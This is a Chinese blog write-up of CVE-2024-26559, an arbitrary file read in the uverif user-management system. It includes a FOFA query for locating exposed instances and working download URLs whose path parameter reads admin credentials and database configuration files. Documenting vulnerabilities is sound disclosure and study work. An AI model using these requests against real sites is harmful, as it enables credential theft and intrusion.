CVE-2024-26559
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
漏洞名称
U验证任意文件读取漏洞
漏洞影响
uverif <= v2.0.4-beta,uverif <= v2.0
uverif是一个开源项目,相关链接如下:
官网: https://user.uverif.com/
Github: https://github.com/51154393/uverif
Gitee: https://gitee.com/dagg/uverif
漏洞描述
uverif网络验证用户管理系统,该系统uverif <= v2.0.4-beta,uverif <= v2.0版本中存在任意文件读取漏洞。
导致存在漏洞的代码如下
这是一个PHP命名空间为Ue\tools的类download的代码。该类提供了一个静态方法download,用于下载文件。
方法接受两个参数:$filename表示要下载的文件路径,$downLoadName表示下载时保存的文件名(可选,默认为原始文件名)。
FOFA搜索语句
body="U用户验证系统1.0"
漏洞复现
其漏洞点在于登录后台后生成卡密导出的下载处
http://127.0.0.1/admin/download?path=./app/data/kami/202401210556174.txt
修改路径即可构造任意文件读取, “./“代表当前目录,可读取数据库配置文件,当前管理员账户密码等
http://127.0.0.1/admin/download?path=./config/admin.php
http://127.0.0.1/admin/download?path=./config/config.php
读取C:\Windows\win.ini
漏洞复现成功
修复建议
升级到最新版本。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果